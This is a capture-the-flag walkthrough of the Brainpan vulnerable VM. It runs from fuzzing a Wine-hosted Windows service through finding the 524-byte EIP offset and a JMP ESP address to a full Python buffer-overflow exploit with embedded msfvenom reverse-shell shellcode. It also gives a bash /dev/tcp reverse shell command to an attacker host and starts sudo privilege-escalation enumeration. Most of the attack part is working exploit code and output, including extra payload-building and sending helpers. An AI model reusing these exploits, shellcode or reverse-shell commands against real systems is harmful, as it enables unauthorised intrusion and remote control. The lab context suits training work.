_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> ACCESS DENIED
ACCESS GRANTED

So I tried it on the website: nothing, I cannot get past the login. With netcat I can log in (ACCESS GRANTED), but then nothing else happens.

I tried adding an argument to the netcat call and got an odd message:

root@kali:~# netcat 192.168.1.149 9999 $(python -c "print 'shitstorm'")
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> shitstorm
ACCESS GRANTEDinvalid port shitstorm

Interesting… So maybe I can open a new port:

netcat 192.168.1.149 9999 80
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> shitstorm
ACCESS GRANTEDroot@kali:~#

But when I try to open a web page on port 80, no response. Maybe it opened something different, so let's check it:

nc -v 192.168.1.149 80
brainpan.lan [192.168.1.149] 80 (http) : Connection refused

So there is no error message, but no new connection is accepted either.

I tried port 21: same thing, no error but nothing happens.

So let's try all of them:

In list.txt, I have the password: shitstorm

Then I created knock.sh:

#!/bin/bash
# Send the password to 9999 once per candidate port number, passing the
# number as an extra argument to nc.
i=0
while [ "$i" -lt 65535 ]
do
    echo "$i"
    nc 192.168.1.149 9999 < list.txt "$i"
    i=$((i+1))
done

I executed it and re-ran nmap: nothing changed. No surprise, in hindsight: the "invalid port shitstorm" message had come from netcat itself, which parses every argument after the first port as another port to connect to, so the server never received the extra argument.

So I tried to disassemble it using radare2:

Found this:
section..rdata ; [02] -r– section size 4096 named .rdata

Maybe it can be overflowed…

Nope…

But I also saw this:

str.ACCESS_GRANTED
0x31173319 2020 2020 2020 2020 2020 2020 2020 20
0x31173328 2020 2020 2020 4143 4345 5353 2047 52 ACCESS GR
0x31173337 414e 5445 440a 005b 2b5d 2069 6e69 74 ANTED..[+] init ; str.initializing_winsock…
0x31173346 6961 6c69 7a69 6e67 2077 696e 736f 63 ializing winsoc
0x31173355 6b2e 2e2e 005b 215d 2077 696e 736f 63 k….[!] winsoc ; str.winsock_init_failed:__d
0x31173364 6b20 696e 6974 2066 6169 6c65 643a 20 k init failed:
0x31173373 2564 0064 6f6e 652e 0a00 0000 005b 21 %d.done……[! ; str.done. ; str.could_not_create_socket:__d
0x31173382 5d20 636f 756c 6420 6e6f 7420 6372 65 ] could not cre
0x31173391 6174 6520 736f 636b 6574 3a20 2564 00 ate socket: %d.

0x311733a0 5b2b 5d20 7365 7276 6572 2073 6f63 6b [+] server sock ; str.server_socket_created.

0x311733af 6574 2063 7265 6174 6564 2e0a 005b 21 et created…[! ; str.bind_failed:__d
0x311733be 5d20 6269 6e64 2066 6169 6c65 643a 20 ] bind failed:
0x311733cd 2564 005b 2b5d 2062 696e 6420 646f 6e %d.[+] bind don ; str.bind_done_on_port__d
0x311733dc 6520 6f6e 2070 6f72 7420 2564 0a00 5b e on port %d..[ ; str.waiting_for_connections.
0x311733eb 2b5d 2077 6169 7469 6e67 2066 6f72 20 +] waiting for
0x311733fa 636f 6e6e 6563 7469 6f6e 732e 0a00 5b connections…[ ; str.received_connection.
0x31173409 2b5d 2072 6563 6569 7665 6420 636f 6e +] received con
0x31173418 6e65 6374 696f 6e2e 0a00 5b2b 5d20 63 nection…[+] c ; str.check_is__d
0x31173427 6865 636b 2069 7320 2564 0a00 5b21 5d heck is %d..[!] ; str.accept_failed:__d
0x31173436 2061 6363 6570 7420 6661 696c 6564 3a accept failed:
0x31173445 2025 6400 5b2b 5d20 636c 6561 6e69 6e %d.[+] cleanin ; str.cleaning_up.
0x31173454 6720 7570 2e0a 0000 0000 0000 2d4c 49 g up……..-LI ; str.LIBGCCW32_EH_3_SJLJ_GTHR_MINGW32
0x31173463 4247 4343 5733 322d 4548 2d33 2d53 4a BGCCW32-EH-3-SJ
0x31173472 4c4a 2d47 5448 522d 4d49 4e47 5733 32 LJ-GTHR-MINGW32
0x31173481 0000 0077 3332 5f73 6861 7265 6470 74 …w32_sharedpt ; str.w32_sharedptr__size____sizeof_W32_EH_SHARED

So my first idea should have worked... Weird.

Trying differently:

Running brainpan.exe using wine:

wine brainpan.exe
[+] initializing winsock…done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

Then I push a file of 3000 "A" characters at it:

nc 192.168.1.123 9999 < overflow
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

[+] received connection.
[get_reply] s = [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx■C]
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on read access to 0x41414141 at address 0x41414141 (thread 0009), starting debugger…
0009:err:seh:start_debugger Couldn't start debugger ("winedbg --auto 8 48") (2)
Read the Wine Developers Guide on how to set up winedbg or another debugger

CRASH… We can overflow it!

So I ran it with winedbg:

Unhandled exception: page fault on read access to 0x41414141 in 32-bit code (0x41414141).
Register dump:
CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063
EIP:41414141 ESP:0043f860 EBP:41414141 EFLAGS:00010202( R- — I – – – )
EAX:ffffffff EBX:7b63ee08 ECX:0043f640 EDX:0043f650
ESI:7b63ee08 EDI:00000000
Stack dump:
0x0043f860: 41414141 41414141 41414141 41414141
0x0043f870: 41414141 41414141 41414141 41414141
0x0043f880: 41414141 41414141 41414141 41414141
0x0043f890: 41414141 41414141 41414141 41414141
0x0043f8a0: 41414141 41414141 41414141 41414141
0x0043f8b0: 41414141 41414141 41414141 41414141

We overwrote EIP, so we control the return address. Now let's find the exact offset at which it gets overwritten:

First we create a unique pattern:

msf-pattern_create -l 1200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9

Then inject the pattern the same way. It crashes again, this time with pattern bytes in EIP:

Unhandled exception: page fault on read access to 0x35724134 in 32-bit code (0x35724134).
Register dump:
CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063
EIP:35724134 ESP:0042f860 EBP:72413372 EFLAGS:00010202( R- -- I - - - )
EAX:ffffffff EBX:7b63ee08 ECX:0042f640 EDX:0042f650
ESI:7b63ee08 EDI:00000000
Stack dump:
0x0042f860: 41367241 72413772 39724138 41307341
0x0042f870: 73413173 33734132 41347341 73413573
0x0042f880: 37734136 41387341 74413973 31744130
0x0042f890: 41327441 74413374 35744134 41367441
0x0042f8a0: 74413774 39744138 41307541 75413175
0x0042f8b0: 33754132 41347541 75413575 37754136
Backtrace:
=>0 0x35724134 (0x72413372)
0x35724134: — no code accessible —
Modules:
Module Address Debug info Name (5 modules)
PE 31170000-31176000 Deferred brainpan
PE 7b420000-7b5d1000 Deferred kernel32
PE 7bc10000-7bc14000 Deferred ntdll
PE 7faf0000-7faf4000 Deferred ws2_32
PE 7fb30000-7fb34000 Deferred msvcrt

Now finding the offset:

msf-pattern_offset -q 35724134
[*] Exact match at offset 524

So 524 bytes of padding put the next 4 bytes of input into EIP. That is the offset to the return address, not the payload length: everything we send after those 528 bytes sits on the stack right where ESP points after the ret, and that is what we control next.
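The offset search above relies on Metasploit's pattern tools. As an added example that is not part of the original write-up, here is a self-contained Python 3 re-implementation of msf-pattern_create and msf-pattern_offset. It assumes the standard Metasploit charset (A-Z, a-z, 0-9, three characters per group, 20280 bytes before it repeats), reverses the four bytes the way x86 stores them, and recovers the 524 found above from the EIP value 0x35724134; it works the same for any other EIP value read out of a register dump.

```python
import itertools
import string
import struct

# Added example, not the write-up's tooling: a stand-in for msf-pattern_create
# and msf-pattern_offset that needs nothing but the standard library.

MAX_UNIQUE = 26 * 26 * 10 * 3   # length before the Metasploit pattern repeats


def pattern_create(length):
    """Build the cyclic pattern Aa0Aa1...Az9Ba0... truncated to `length` bytes."""
    groups = []
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        groups.append(upper + lower + digit)
        if len(groups) * 3 >= length:
            break
    return "".join(groups)[:length]


def pattern_offset(value, length=MAX_UNIQUE, little_endian=True):
    """Map a 32-bit value seen in EIP back to its offset in the pattern.

    `value` is an int such as 0x35724134 from the winedbg register dump, or the
    same thing as a hex string ("35724134").  On x86 the four bytes of the
    overwritten return address are stored little-endian, so they are reversed
    before searching, exactly as `msf-pattern_offset -q` does.  Returns -1 if
    the value does not occur in the pattern (for instance EIP was only
    partially overwritten).
    """
    if isinstance(value, str):
        value = int(value, 16)
    fmt = "<I" if little_endian else ">I"
    needle = struct.pack(fmt, value).decode("ascii", "replace")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(1200))            # same 1200-byte pattern as above
    print(pattern_offset(0x35724134))      # brainpan: 524
```

pattern_create(1200) ends in Bn9 like the msf output above, and pattern_offset(0x35724134) returns 524; a result of -1 is the signal to look at the bytes around EIP in the stack dump instead.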

Let's start working on the exploit. First a skeleton with the layout (padding, return address, NOP sled, shellcode); the return address and shellcode in it are placeholders (Linux int 0x80 shellcode and a raw stack address, neither of which can work against a Windows binary under Wine) and both are replaced below:

#!/usr/bin/python
import struct
pad = "\x41" * 524                    # filler up to the saved return address
EIP = struct.pack("I", 0xffffdd34)    # placeholder, replaced by a JMP ESP address below
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"  # Linux placeholder
NOP = "\x90" * 1000
print pad + EIP + NOP + shellcode

Found a JMP ESP with OllyDbg (screenshot not reproduced). It is at 0x311712F3, inside the brainpan module mapped at 31170000-31176000 in the module list above, so it is an address we can rely on as long as the module loads at the same base:

311712F3

#!/usr/bin/python
import socket
import struct
server = '192.168.1.149'
sport = 9999

pad = "\x41" * 524                    # offset found with msf-pattern_offset
EIP = struct.pack("I", 0x311712F3)    # JMP ESP in brainpan.exe, packed little-endian
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"  # still the placeholder
NOP = "\x90" * 1000
exploit = pad + EIP + NOP + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, sport))
print s.recv(1024)                    # read the banner before sending
print "Sending attack "
# NB: any prefix in front of pad shifts the offset measured above;
# the final version below sends the buffer alone.
s.send('shitstorm .' + exploit + '\r\n')
print s.recv(1024)
s.close()

Now generating the real payload. brainpan.exe is a Windows binary running under Wine, so it gets a Windows reverse shell, with the null byte excluded since it would terminate the string copy:

msfvenom -p windows/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.123 -b "\x00" -e x86/shikata_ga_nai -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xda\xdf\xd9\x74\x24\xf4\xbb\xb9\xcc\xed\x34\x5d\x29\xc9\xb1"
"\x52\x31\x5d\x17\x03\x5d\x17\x83\x7c\xc8\x0f\xc1\x82\x39\x4d"
"\x2a\x7a\xba\x32\xa2\x9f\x8b\x72\xd0\xd4\xbc\x42\x92\xb8\x30"
"\x28\xf6\x28\xc2\x5c\xdf\x5f\x63\xea\x39\x6e\x74\x47\x79\xf1"
"\xf6\x9a\xae\xd1\xc7\x54\xa3\x10\x0f\x88\x4e\x40\xd8\xc6\xfd"
"\x74\x6d\x92\x3d\xff\x3d\x32\x46\x1c\xf5\x35\x67\xb3\x8d\x6f"
"\xa7\x32\x41\x04\xee\x2c\x86\x21\xb8\xc7\x7c\xdd\x3b\x01\x4d"
"\x1e\x97\x6c\x61\xed\xe9\xa9\x46\x0e\x9c\xc3\xb4\xb3\xa7\x10"
"\xc6\x6f\x2d\x82\x60\xfb\x95\x6e\x90\x28\x43\xe5\x9e\x85\x07"
"\xa1\x82\x18\xcb\xda\xbf\x91\xea\x0c\x36\xe1\xc8\x88\x12\xb1"
"\x71\x89\xfe\x14\x8d\xc9\xa0\xc9\x2b\x82\x4d\x1d\x46\xc9\x19"
"\xd2\x6b\xf1\xd9\x7c\xfb\x82\xeb\x23\x57\x0c\x40\xab\x71\xcb"
"\xa7\x86\xc6\x43\x56\x29\x37\x4a\x9d\x7d\x67\xe4\x34\xfe\xec"
"\xf4\xb9\x2b\xa2\xa4\x15\x84\x03\x14\xd6\x74\xec\x7e\xd9\xab"
"\x0c\x81\x33\xc4\xa7\x78\xd4\x2b\x9f\x83\x5f\xc4\xe2\x83\x8e"
"\x48\x6a\x65\xda\x60\x3a\x3e\x73\x18\x67\xb4\xe2\xe5\xbd\xb1"
"\x25\x6d\x32\x46\xeb\x86\x3f\x54\x9c\x66\x0a\x06\x0b\x78\xa0"
"\x2e\xd7\xeb\x2f\xae\x9e\x17\xf8\xf9\xf7\xe6\xf1\x6f\xea\x51"
"\xa8\x8d\xf7\x04\x93\x15\x2c\xf5\x1a\x94\xa1\x41\x39\x86\x7f"
"\x49\x05\xf2\x2f\x1c\xd3\xac\x89\xf6\x95\x06\x40\xa4\x7f\xce"
"\x15\x86\xbf\x88\x19\xc3\x49\x74\xab\xba\x0f\x8b\x04\x2b\x98"
"\xf4\x78\xcb\x67\x2f\x39\xfb\x2d\x6d\x68\x94\xeb\xe4\x28\xf9"
"\x0b\xd3\x6f\x04\x88\xd1\x0f\xf3\x90\x90\x0a\xbf\x16\x49\x67"
"\xd0\xf2\x6d\xd4\xd1\xd6";

Code is now:

#!/usr/bin/python
import socket
server = '192.168.1.149'
##server = '192.168.1.123'
sport = 9999

pad = "\x41" * 524                    # offset to the saved return address
EIP = "\xf3\x12\x17\x31"              # 0x311712F3 (JMP ESP in brainpan.exe), little-endian
shellcode = ("\xda\xdf\xd9\x74\x24\xf4\xbb\xb9\xcc\xed\x34\x5d\x29\xc9\xb1"
"\x52\x31\x5d\x17\x03\x5d\x17\x83\x7c\xc8\x0f\xc1\x82\x39\x4d"
"\x2a\x7a\xba\x32\xa2\x9f\x8b\x72\xd0\xd4\xbc\x42\x92\xb8\x30"
"\x28\xf6\x28\xc2\x5c\xdf\x5f\x63\xea\x39\x6e\x74\x47\x79\xf1"
"\xf6\x9a\xae\xd1\xc7\x54\xa3\x10\x0f\x88\x4e\x40\xd8\xc6\xfd"
"\x74\x6d\x92\x3d\xff\x3d\x32\x46\x1c\xf5\x35\x67\xb3\x8d\x6f"
"\xa7\x32\x41\x04\xee\x2c\x86\x21\xb8\xc7\x7c\xdd\x3b\x01\x4d"
"\x1e\x97\x6c\x61\xed\xe9\xa9\x46\x0e\x9c\xc3\xb4\xb3\xa7\x10"
"\xc6\x6f\x2d\x82\x60\xfb\x95\x6e\x90\x28\x43\xe5\x9e\x85\x07"
"\xa1\x82\x18\xcb\xda\xbf\x91\xea\x0c\x36\xe1\xc8\x88\x12\xb1"
"\x71\x89\xfe\x14\x8d\xc9\xa0\xc9\x2b\x82\x4d\x1d\x46\xc9\x19"
"\xd2\x6b\xf1\xd9\x7c\xfb\x82\xeb\x23\x57\x0c\x40\xab\x71\xcb"
"\xa7\x86\xc6\x43\x56\x29\x37\x4a\x9d\x7d\x67\xe4\x34\xfe\xec"
"\xf4\xb9\x2b\xa2\xa4\x15\x84\x03\x14\xd6\x74\xec\x7e\xd9\xab"
"\x0c\x81\x33\xc4\xa7\x78\xd4\x2b\x9f\x83\x5f\xc4\xe2\x83\x8e"
"\x48\x6a\x65\xda\x60\x3a\x3e\x73\x18\x67\xb4\xe2\xe5\xbd\xb1"
"\x25\x6d\x32\x46\xeb\x86\x3f\x54\x9c\x66\x0a\x06\x0b\x78\xa0"
"\x2e\xd7\xeb\x2f\xae\x9e\x17\xf8\xf9\xf7\xe6\xf1\x6f\xea\x51"
"\xa8\x8d\xf7\x04\x93\x15\x2c\xf5\x1a\x94\xa1\x41\x39\x86\x7f"
"\x49\x05\xf2\x2f\x1c\xd3\xac\x89\xf6\x95\x06\x40\xa4\x7f\xce"
"\x15\x86\xbf\x88\x19\xc3\x49\x74\xab\xba\x0f\x8b\x04\x2b\x98"
"\xf4\x78\xcb\x67\x2f\x39\xfb\x2d\x6d\x68\x94\xeb\xe4\x28\xf9"
"\x0b\xd3\x6f\x04\x88\xd1\x0f\xf3\x90\x90\x0a\xbf\x16\x49\x67"
"\xd0\xf2\x6d\xd4\xd1\xd6")
NOP = "\x90" * 16                     # small sled; ESP points right here after JMP ESP
exploit = pad + EIP + NOP + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, sport))
s.recv(1024)                          # banner
s.send(exploit)
s.close()
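Between the msfvenom output and the socket code above there are two things a practitioner checks rather than trusts: that the C array was transcribed into bytes correctly, and that no byte the target's string handling stops on (here the NUL excluded with -b) crept in anywhere in the buffer, including inside the return address. The Python 3 block below is an added example, not the write-up's exploit: it parses msfvenom -f c output into bytes, assembles the same layout (524 bytes of padding, JMP ESP 0x311712F3 little-endian, 16 NOPs, shellcode), scans the whole buffer for bad characters, and only then sends it. The C array inside it is a constructed stand-in of a few bytes, not the real 351-byte reverse shell; host and port are the write-up's.

```python
import re
import socket
import struct

# Added example, not the write-up's code.  Python 3.


def c_array_to_bytes(c_text):
    """Convert msfvenom -f c output (the "\\x.." string lines) into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", c_text))


def find_badchars(data, badchars):
    """Return (index, byte) for every forbidden byte in data; an empty list means clean."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def build_payload(offset, ret_addr, shellcode, nop_len=16, badchars=b"\x00"):
    """Assemble padding | return address | NOP sled | shellcode.

    After RET pops the overwritten return address, ESP points at the bytes
    that follow it, so JMP ESP lands on the NOP sled and slides into the
    shellcode.  The whole buffer is scanned, not just the shellcode: a 0x00
    inside the return address would truncate the copy just the same.
    """
    ret = struct.pack("<I", ret_addr)          # x86 stores the address little-endian
    payload = b"A" * offset + ret + b"\x90" * nop_len + shellcode
    bad = find_badchars(payload, badchars)
    if bad:
        raise ValueError("bad characters at %r" % bad[:5])
    return payload


def send_payload(host, port, payload, timeout=5):
    """Deliver the buffer the way the write-up does: connect, read the banner, send."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024)
        s.sendall(payload)
    return banner


# Constructed stand-in for the msfvenom -f c output: a few bytes are enough to
# show the parsing.  NOT the real 351-byte windows/shell_reverse_tcp payload.
MSFVENOM_C_OUTPUT = r'''
unsigned char buf[] =
"\xda\xdf\xd9\x74\x24\xf4\xbb\xb9\xcc\xed\x34\x5d\x29\xc9\xb1"
"\x52\x31\x5d\x17";
'''

OFFSET = 524           # from msf-pattern_offset above
JMP_ESP = 0x311712F3   # JMP ESP inside brainpan.exe, found with OllyDbg above
SHELLCODE = c_array_to_bytes(MSFVENOM_C_OUTPUT)
PAYLOAD = build_payload(OFFSET, JMP_ESP, SHELLCODE)

if __name__ == "__main__":
    # listener first: nc -nvlp 4444 on the LHOST given to msfvenom
    print(send_payload("192.168.1.149", 9999, PAYLOAD))
```

Paste the full msfvenom output into MSFVENOM_C_OUTPUT and len(SHELLCODE) should come out as 351, the size msfvenom reported; if it does not, a line was lost in the copy. Extending badchars (for instance to b"\x00\x0a\x0d" for a line-oriented service) is the only change needed when a target turns out to choke on more than NUL.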

Setting a listener on port 4444 (the LPORT given to msfvenom):

nc -nvlp 4444

Then ran my exploit and the shell came back:

nc -lvnp 4444
listening on [any] 4444 …
connect to [192.168.1.123] from (UNKNOWN) [192.168.1.149] 34588
CMD Version 1.4.1

Z:\home\puck>whoami
File not found.

Z:\home\puck>dir
Volume in drive Z has no label.
Volume Serial Number is 0000-0000

Directory of Z:\home\puck

3/6/2013 3:23 PM <DIR> .
3/4/2013 11:49 AM <DIR> ..
3/6/2013 3:23 PM 513 checksrv.sh
3/4/2013 2:45 PM <DIR> web
1 file 513 bytes
3 directories 13,846,552,576 bytes free

ESCALATION:

Z:\home\puck>type checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep brainpan.exe | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
killall wineserver
killall winedevice.exe
fi
/usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi

# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
fi
cd /home/puck/web
/usr/bin/python -m SimpleHTTPServer 10000
fi

Nothing directly usable there, but it explains why brainpan.exe comes right back after every crash: the script restarts it under Wine whenever nothing is listening on 9999.

This machine is strange... almost all folders are empty.
Trying to detect the Windows version:

ver

CMD Version 1.4.1

Even more strange:

Z:\home\puck>cd ..

Z:\home>cd ..

Z:\>dir /a
Volume in drive Z has no label.
Volume Serial Number is 0000-0000

Directory of Z:\

3/4/2013 1:02 PM <DIR> bin
3/4/2013 11:19 AM <DIR> boot
8/28/2019 8:03 PM <DIR> etc
3/4/2013 11:49 AM <DIR> home
3/4/2013 11:18 AM 15,084,717 initrd.img
3/4/2013 11:18 AM 15,084,717 initrd.img.old
3/4/2013 1:04 PM <DIR> lib
3/4/2013 10:12 AM <DIR> lost+found
3/4/2013 10:12 AM <DIR> media
10/9/2012 9:59 AM <DIR> mnt
3/4/2013 10:13 AM <DIR> opt
3/7/2013 11:07 PM <DIR> root
8/28/2019 8:03 PM <DIR> run
3/4/2013 11:20 AM <DIR> sbin
6/11/2012 9:43 AM <DIR> selinux
3/4/2013 10:13 AM <DIR> srv
8/28/2019 8:04 PM <DIR> tmp
3/4/2013 10:13 AM <DIR> usr
8/28/2019 8:03 PM <DIR> var
2/25/2013 2:32 PM 5,180,432 vmlinuz
2/25/2013 2:32 PM 5,180,432 vmlinuz.old
4 files 40,530,298 bytes
17 directories 13,846,274,048 bytes free

So I am on a Linux box: Z: is Wine's mapping of the host's root filesystem, and the prompt is Wine's cmd.exe, not a real Windows shell.

Went to Z:\bin and executed bash... it worked! Wine's cmd can start native Linux executables through the Z: drive, so we get a real shell as the user running brainpan.exe.

So on the target I ran:
bash -i >& /dev/tcp/192.168.1.123/6666 0>&1

And on kali:

nc -lnvp 6666

And I have now a bash shell…

nc -nvlp 6666
listening on [any] 6666 …
connect to [192.168.1.123] from (UNKNOWN) [192.168.1.149] 35588
bash: no job control in this shell

A little bit of cleaning, upgrading to a proper TTY:

puck@brainpan:/bin$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

Now let's dig:

sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util

For now it seems that I can only execute that one file as root, without a password.

So let's run LinEnum:

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.10
DISTRIB_CODENAME=quantal
DISTRIB_DESCRIPTION=”Ubuntu 12.10″
NAME=”Ubuntu”
VERSION=”12.10, Quantal Quetzal”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu quantal (12.10)”
VERSION_ID=”12.10″

We can sudo without supplying a password!
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util

### INTERESTING FILES ####################################
